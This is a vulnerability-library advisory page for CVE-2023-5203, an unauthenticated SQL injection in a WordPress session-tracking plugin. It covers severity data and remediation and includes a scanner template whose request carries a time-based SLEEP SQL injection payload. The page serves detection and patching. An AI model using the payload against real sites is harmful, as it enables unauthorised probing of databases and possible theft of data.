/Vulnerability Library

WP Sessions Time Monitoring Full Automatic <= 1.0.8 - SQL Injection

CVE-2023-5203
Verified

Description

The WP Sessions Time Monitoring Full Automatic plugin for WordPress is vulnerable to SQL Injection via request parameters in all versions up to, and including, 1.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Severity

Critical

CVSS Score

9.8

Exploit Probability

43%

Published Date

February 24, 2026

Template Author

shivam kamboj

CVE-2023-5203.yaml
id: CVE-2023-5203

info:
  name: WP Sessions Time Monitoring Full Automatic <= 1.0.8 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The WP Sessions Time Monitoring Full Automatic plugin for WordPress is vulnerable to SQL Injection via request parameters in all versions up to, and including, 1.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Attackers can retrieve sensitive database information without authentication, leading to data breach and privacy violations.
  remediation: |
    Update to version 1.0.9 or later to fix the vulnerability.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/activitytime/wp-sessions-time-monitoring-full-automatic-108-unauthenticated-sql-injection
    - https://wordpress.org/plugins/activitytime/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5203
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-5203
    epss-score: 0.42933
    epss-percentile: 0.97536
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,activitytime

http:
  - raw:
      - |
        @timeout: 30s
        GET /?id=1%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%287%29%29%29test%29%20--%20 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 7'
          - 'status_code == 200'
          - 'contains(body, "activitytime_tracker")'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 4a0a0047304502210082c9966d186a7849c2f1d3ab217cda95d7e41300dc59097eb0793662d984a47b02206f3e7db0ec6994d4c3d6928df9874212c6b6fa098718f55a0b8333e7cbdd67a7:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2023-5203
CWE ID:
cwe-89

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/activitytime/wp-sessions-time-monitoring-full-automatic-108-unauthenticated-sql-injectionhttps://wordpress.org/plugins/activitytime/https://nvd.nist.gov/vuln/detail/CVE-2023-5203

Remediation Steps

Update to version 1.0.9 or later to fix the vulnerability.